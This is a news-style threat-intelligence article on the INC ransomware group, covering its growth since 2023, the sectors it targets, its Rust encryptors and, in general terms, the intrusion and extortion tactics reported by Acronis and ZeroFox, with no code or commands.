The Rise of INC Ransomware: Observations from Cybersecurity Experts
Cybersecurity researchers have recently tracked the notable evolution of a ransomware group known as INC, illustrating its journey from a fledgling ransomware-as-a-service (RaaS) operation to one of the most prolific cybercriminal entities by 2026. Since August 2023, INC has reportedly targeted and compromised no less than 830 victims, marking a significant increase in cyber threats globally.
Darrel Virtusio, a researcher at Acronis, highlighted a pivotal moment in the ransomware landscape, stating that the disruption of well-known groups such as LockBit and the shutdown of BlackCat presented unique opportunities for INC’s expansion. As affiliates from these now-dismantled organizations migrated towards alternatives, INC seized the chance to solidify its position in the cybercrime hierarchy. Notably, a staggering 65% of the victims attributed to INC are based in the United States, with sectors such as legal services, manufacturing, construction, technology, and healthcare emerging as prime targets. This trend underscores the vulnerabilities that exist in industries where operational efficiency and continuity are critical.
INC’s technical sophistication has also evolved, as its encryption tools for both Windows and Linux/ESXi systems were rewritten in the Rust programming language. This adaptation allows for smoother cross-platform functionality and provides greater resilience against reverse engineering attempts. The group’s expanding arsenal includes an updated credential dumper capable of targeting recent Veeam backup deployments that utilize salted DPAPI credential encryption. This signals a clever adaptation to the evolving defensive capabilities of organizations as they strive to safeguard their systems.
Further complicating the issue, the underground cybercrime marketplace witnessed the sale of INC’s Windows and Linux variants in May 2024. This move has spurred the emergence of related ransomware families like Lynx and Sinobi, sharing significant code similarities. Such evolution highlights the collective nature of cybercriminal networks where innovations or tools can quickly proliferate among various factions.
According to Acronis, INC affiliates have employed a diverse array of techniques in their campaigns. Recent attacks reveal that they are increasingly seeking unpatched edge devices for initial access, capitalizing on existing vulnerabilities. The methodology employed includes dumping credentials from Veeam backup servers and leveraging various tools, including LOLBins and commercial remote monitoring and management (RMM) software, to navigate networks undetected.
The attack vector employed by INC follows a detailed sequence designed for effectiveness and efficiency. Initially, access is gained through various methods—spear-phishing, purchasing stolen account credentials from Initial Access Brokers (IABs), or exploiting known vulnerabilities in public-facing applications. Such vulnerabilities include exploits for Citrix Netscaler and Fortinet EMS, among others, showcasing the group’s pragmatic approach to identifying weaknesses in even well-regarded software.
Once inside a compromised environment, INC attackers systematically extract sensitive credentials, enabling further movement within the victim’s network. They utilize living-off-the-land binaries (LOLBins), such as Remote Desktop Protocol (RDP) and PsExec, to facilitate lateral movement, which underscores a calculated strategy to maintain a low profile as they expand their control.
Employing advanced tactics such as the Bring Your Own Vulnerable Drive (BYOVD) technique, they further compromise defenses. This approach not only enhances their foothold but also facilitates the deployment of command-and-control operations using tools like Cobalt Strike and TeamViewer, effectively allowing attackers to manipulate compromised systems remotely.
As data of interest is exfiltrated through the use of Rclone—staging it into password-protected archives—the final step involves launching the ransomware encryptor. This step is optimized through techniques like multithreading and partial encryption, which creates an efficient operational flow, particularly when the payload is executed with specific parameters aimed at shutting down virtual machines.
Recent data compiled by ZeroFox indicates that INC ransomware has emerged as the fourth most prevalent ransomware group in the first quarter of 2026, trailing behind counterparts such as Qilin, Akira, and The Gentlemen. With over 120 incidents attributed to it during this period, the rising threat is becoming increasingly evident.
Acronis’s research stresses that INC continues to bolster its operations through constant development in Rust-based payloads and an ever-evolving toolkit. The group targets sectors including healthcare, legal services, and manufacturing—industries wherein operational downtime can create immense financial pressure to acquiesce to ransom demands. This financial coercion is further exacerbated by the critical dependencies these sectors have on seamless operations and stable supply chains, posing a wider risk of collateral damage across interconnected vendor networks.
The conclusion drawn from these insights forms a clear warning that the evolving landscape of ransomware presents multifaceted challenges, demanding increased vigilance and adaptive strategies from those in affected industries.